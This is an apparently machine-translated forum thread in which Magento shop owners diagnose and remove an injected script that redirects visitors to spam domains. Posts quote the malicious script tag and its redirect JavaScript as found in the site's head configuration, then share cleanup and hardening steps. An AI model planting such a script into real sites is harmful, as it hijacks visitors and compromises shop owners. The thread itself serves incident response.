Il sito Web inizia a reindirizzare a un altro URL

Maybe it's infected by some virus.

Il mio sito Web inizia a reindirizzare a questi URL infetti.

http://mon.setsu.xyz
e qualche tempo https://tiphainemollard.us/index/?1371499155545
Link infetti

cosa ho fatto per risolvere.

1. File .htaccess commentato (non succede nulla)
2. Cartella include commentata (non succede nulla)
3. Server completo sottoposto a scansione (non accade nulla, non è stato rilevato alcun malware)
4. Modificato CSS, media e percorso js dal database solo per garantire che il suo PHP o qualsiasi js stiano facendo del tempo (non succede nulla)
5. select * from core_config_data where path like '%secure%';tutti i collegamenti sono ok AGGIORNAMENTO

Ho cercato su Google e molti articoli sono stati scritti su questo, ma suggeriscono che si trattava di un problema del browser o il mio sistema è infetto. Un articolo su questo anche se apro il sito sul mio telefono o sul mio laptop personale, i problemi sono gli stessi.

AGGIORNAMENTO 2

Ho trovato la riga nel database che è interessato. (come dice anche Boris K.)

Nella core_config_data tabella il design/head/includes valore ha a

<script src="<a href="https://melissatgmt.us/redirect_base/redirect.js">https://melissatgmt.us/redirect_base/redirect.js</a>" id="1371499155545"></script>  

Che verrà inserito nella sezione head al caricamento della pagina.

Se visiti l'URL sopra, otterrai uno script di reindirizzamento che è

   var redirChrome;
var isToChrome = document.currentScript.getAttribute('data-type');

if((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome){

 var idToRedirect = document.currentScript.getAttribute('id'); 

window.location.replace('https://tiphainemollard.us/index/?'+idToRedirect);
}

Il sito Web del cliente funziona dal pomeriggio una volta rimosso lo script. But the main problem is how that script inserted into the database.

Anche una patch è obsoleta, quindi ho aggiornato anche quella patch.

AGGIORNAMENTO 3 Il sito è di nuovo infetto. Questo è lo script inserito nella sezione Admin ( Admin-> Configurazione-> Generale-> Progettazione-> Head HTML-> Script vari )

E nella colonna del database

Non so cosa fare adesso. Come ho cambiato ogni password, ho eliminato tutti i vecchi utenti.

AGGIORNAMENTO 3

Finora quell'errore non si presenta quindi significa che seguendo i passaggi precedenti possiamo superare questo problema.

UPDATE :: 4 Installa sempre le patch perché mi aiuta nei progetti a rendere il negozio meno soggetto a questo tipo di problemi e anche le patch sono importanti. È possibile utilizzare https://magescan.com/ per verificare i problemi sul proprio sito Web.

Ho trovato il codice iniettato nella core_config_datatabella, sotto design/head/includes. Rimosso e ora il sito è tornato alla normalità.

AGGIORNAMENTO: Come menzionato da tutti, è successo di nuovo stamattina. Questa volta me ne sono liberato più facilmente dal Pannello di amministrazione in System > Configuration > General > Design > HTML Head > Miscellaneous Scripts. Questa è un'enorme vulnerabilità, spero che Magento stia lavorando su una patch.

AGGIORNAMENTO 2: lo script è tornato di nuovo, quindi ho modificato la password del database, cancellato la cache. Circa un'ora dopo, la sceneggiatura è tornata. Quindi non penso che sia stato aggiunto attraverso il db. Ho appena cambiato la mia password di amministratore, vediamo se torna di nuovo.

AGGIORNAMENTO 3: Da quando ho modificato la password dell'amministratore ieri su entrambi i siti interessati, circa 24 ore dopo entrambi sono ancora puliti.

Stesso problema su un altro sito di Magento. Ho scoperto che uno script viene iniettato nella sezione HEAD della pagina, richiedendo redirect_base / redirect.js da melissatgmt.us (quindi modificato in un altro dominio) ma non riesco a capire come viene iniettata questa merda.

AGGIORNAMENTO : Come menzionato da altri, ho trovato la voce nella tabella core_config_data e l'ho rimossa ma il record era tornato alla pagina successiva ricaricata. Ho cambiato la password del db e ora sembra essere stata sconfitta. Non sono sicuro che la modifica della password sia la soluzione definitiva, ma comunque è un miglioramento della sicurezza.

AGGIORNAMENTO 2 : Come affermato da Jix Sas, l'accesso dalla configurazione nell'amministrazione magento è una soluzione più semplice rispetto all'accesso diretto alla tabella del database. Ma la merda continua a tornare ogni 10/15 minuti.

AGGIORNAMENTO 3 : password dell'amministratore modificata, controllo e salvataggio di alcune pagine cms (servizio clienti e informazioni su di noi) che sembravano in qualche modo infette, cache disabilitata, cache pulita più volte (dopo ogni controllo e salvataggio della pagina cms "infetta") no più sceneggiatura iniettata nelle ultime 8 ore.

Ho cambiato il percorso del pannello di amministrazione app/etc/local.xmle mi aiuta. Lo script non viene più aggiunto a design/head/includes.

Spiegazione :

In app/etc/local.xmlI ho cambiato in <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>precedenza lo era sitedomain.com/admin, e ora sarà il percorso al pannello di amministrazione sitedomain.com/new_admin_path

Questo è un grande sollievo, ho ripristinato il mio sito 10 volte dalla mattina.

Il bug continua a tornare ancora e ancora.

Qual è la soluzione definitiva?

Cambia password DB? Cambia la password di root? Qualche patch è stata rilasciata?

Non sono sicuro che ciò sia correlato, ho ricevuto un'e-mail di seguito da un consulente di sicurezza

Gentile signore o signora,

Siamo Hatimeria, una società di sviluppo Magento con sede in Svizzera, Polonia e Paesi Bassi.

Di recente, abbiamo iniziato a lavorare con un nuovo client e abbiamo rilevato il suo vecchio server. Al momento in cui abbiamo effettuato l'accesso al server, ci siamo imbattuti in alcuni malware, con i quali gli hacker sono stati in grado di prendere il controllo del server del client e utilizzarlo come "macchina per hacker" per hackerare altri siti Web. Ovviamente il client non sapeva che questo stava accadendo sul suo server.

Abbiamo trovato le credenziali del database del tuo sito Web che è stato violato attraverso quel server. Ovviamente non ci faremo nulla, ma mi sento in dovere di contattarti e farti sapere cosa sta succedendo. L'hacking è stato eseguito tramite la vulnerabilità di Magento Cacheleak, che potrebbe essere ancora presente nel tuo negozio in questo momento.

Ti consiglio di occuparti immediatamente di quella vulnerabilità e di modificare la password del database. I nostri tecnici affermano che ciò dovrebbe richiedere circa 30 minuti.

Sul sito Web MageReport puoi vedere cos'altro potrebbe essere vulnerabile al tuo sito web: https://www.magereport.com/scan/?s=

La mia intenzione principale di questa e-mail non è quella di effettuare un'acquisizione del cliente, ma se hai bisogno di aiuto per proteggere il tuo negozio o se hai altre domande, saremo felici di aiutarti.

Cordiali saluti, Thomas Tanner

Quindi immagino che la soluzione sia Cambia password DB

Dobbiamo capire qual è la causa PRINCIPALE di tali iniezioni di spam

Se il tuo sito è stato iniettato, controlla il tuo sito su TUTTE E TRE le scansioni di malware

https://magescan.com

https://www.magereport.com

https://sitecheck.sucuri.net/

Ho la sensazione che ciò sia dovuto alla mancanza di patch di sicurezza! Se vedi una patch mancante, SEGNALA SOTTO QUESTO ARGOMENTO .

1. Cambia password di accesso all'hosting Cambia password del database Cambia password di accesso dell'amministratore NASCONDI AMMINA E SCARICA URL e nascondi / RSS / dalla vista pubblica.

2. Esegui la scansione antivirus completa del sito, il tuo provider di hosting è in grado di scansionare il sito se non puoi farlo da solo.

3. Vai su Sysytem -> Utenti e vedi se ci sono utenti registrati NON AUTORIZZATI sul tuo account.

Ho risolto il problema. Anche dopo che ho cancellato FHIS file <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script>dalla core_config_datatabella in design/head/includesvalore. Non ha risolto il problema. il codice dello script è stato inserito più volte. Per risolvere il problema, basta seguire questi tre passaggi.

1. Elimina il codice dello script dalla core_config_datatabella in design/head/includes.
2. Modifica la password del database comprese le app/etc/local.xmlcredenziali.
3. Svuota la cache nella cartella Magento root usando questo comando rm -rf var/cache/*

ps ho passato tutto il giorno. Spero che questo funzioni per te. E assicurati di eseguire sempre il backup del file.

questa stessa identica cosa mi è successa proprio oggi! reindirizzamento allo stesso sito Web. tuttavia, ho trovato lo script nel pannello di amministrazione di Magento in configurazione> design> html head> script vari. c'era questo script: l' <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script> ho rimosso da lì e il sito web funziona bene. non ho la cartella in cui hai detto di aver trovato lo script. Qualche idea su dove potrebbe essere? (come conosci il percorso di HTML head> script vari)

Inoltre, cosa hai fatto di recente? forse possiamo capire la causa? per me, ho installato un popup di newsletter gratuito che potrebbe essere la causa. e tu?

AGGIORNAMENTO: ora lo script è tornato. Qualcuno mi dice come posso accedere a questo script dal database per rimuoverlo per favore?

AGGIORNAMENTO 2: come affermato da Mark, la rimozione dello script E la modifica della password del database hanno impedito il ritorno dello script. Se qualcuno conosce il nome di questa vulnerabilità o se esiste un pericolo per il pagamento dei clienti, comunicacelo.